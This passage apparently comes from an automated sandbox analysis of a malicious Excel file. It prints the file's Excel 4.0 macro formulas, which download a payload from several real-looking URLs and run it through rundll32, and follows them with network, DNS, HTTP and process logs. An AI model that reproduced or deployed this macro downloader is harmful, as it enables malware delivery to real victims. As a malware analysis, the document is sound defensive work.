        16, 2, =IF(KKLD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lealracecars.com/donnacox/fVqOYBzAUoU/","..\iix.ocx",0,0))
        18, 2, =IF(KKLD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/","..\iix.ocx",0,0))
        20, 2, =IF(KKLD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/","..\iix.ocx",0,0))
        22, 2, =IF(KKLD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/","..\iix.ocx",0,0))
        24, 2, =IF(KKLD4<0, CLOSE(0),)
        26, 2, =EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,"&KKLD8)
        30, 2, =RETURN()
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Feb 4, 2022 11:17:19.428431034 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:19.428498030 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:19.428608894 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:19.439160109 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:19.439220905 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.053210974 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.053528070 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.070975065 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.071031094 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.071352005 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.071434975 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.279237032 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.321898937 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.478128910 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.478286982 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.478291988 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.478363991 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.479675055 CET  49165        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.479688883 CET  443          49165      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.482958078 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.483019114 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.483163118 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.484294891 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.484323025 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.873569012 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.873809099 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.874777079 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.874797106 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:20.898116112 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:20.898133039 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:21.312211037 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:21.312565088 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:21.312604904 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:21.312693119 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:21.313065052 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:21.313142061 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:21.313163042 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:21.313213110 CET  443          49166      190.92.141.240  192.168.2.22
Feb 4, 2022 11:17:21.313232899 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:21.313275099 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:21.320352077 CET  49166        443        192.168.2.22    190.92.141.240
Feb 4, 2022 11:17:21.320389032 CET  443          49166      190.92.141.240  192.168.2.22
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Feb 4, 2022 11:17:19.237400055 CET  52167        53         192.168.2.22    8.8.8.8
Feb 4, 2022 11:17:19.409754038 CET  53           52167      8.8.8.8         192.168.2.22
Timestamp                           Source IP     Dest IP  Trans ID  OP Code             Name                    Type            Class
Feb 4, 2022 11:17:19.237400055 CET  192.168.2.22  8.8.8.8  0x6513    Standard query (0)  burialinsurancelab.com  A (IP address)  IN (0x0001)
Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name                    CName  Address         Type            Class
Feb 4, 2022 11:17:19.409754038 CET  8.8.8.8    192.168.2.22  0x6513    No error (0)  burialinsurancelab.com  -      190.92.141.240  A (IP address)  IN (0x0001)
        • burialinsurancelab.com
Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49165        190.92.141.240  443               C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp                kBytes transferred  Direction  Data
2022-02-04 10:17:20 UTC  0                   OUT        GET /q5kje9/K1mF/ HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: burialinsurancelab.com
        Connection: Keep-Alive
2022-02-04 10:17:20 UTC  0                   IN         HTTP/1.1 302 Found
        Date: Fri, 04 Feb 2022 10:17:20 GMT
        Server: Apache
        Strict-Transport-Security: max-age=63072000; includeSubDomains
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Options: nosniff
        Location: https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi
        Content-Length: 240
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
1           192.168.2.22  49166        190.92.141.240  443               C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp                kBytes transferred  Direction  Data
2022-02-04 10:17:20 UTC  0                   OUT        GET /cgi-sys/suspendedpage.cgi HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: burialinsurancelab.com
        Connection: Keep-Alive
2022-02-04 10:17:21 UTC  1                   IN         HTTP/1.1 200 OK
        Date: Fri, 04 Feb 2022 10:17:21 GMT
        Server: Apache
        Strict-Transport-Security: max-age=63072000; includeSubDomains
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Options: nosniff
        Upgrade: h2,h2c
        Connection: Upgrade, close
        Transfer-Encoding: chunked
        Content-Type: text/html
        Data Ascii: 25d<html><head><title></title><style type="text/css">...body {margin-top: 20px;text-align: center;font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 14px;color: #111111;}h1 {font-size: 20px;margin-b
2022-02-04 10:17:21 UTC  2                   IN         Data Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Target ID:0
        Start time:11:18:12
        Start date:04/02/2022
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Imagebase:0x13fde0000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Target ID:3
        Start time:11:18:19
        Start date:04/02/2022
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r
        Imagebase:0xe0000
        File size:44544 bytes
        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        No disassembly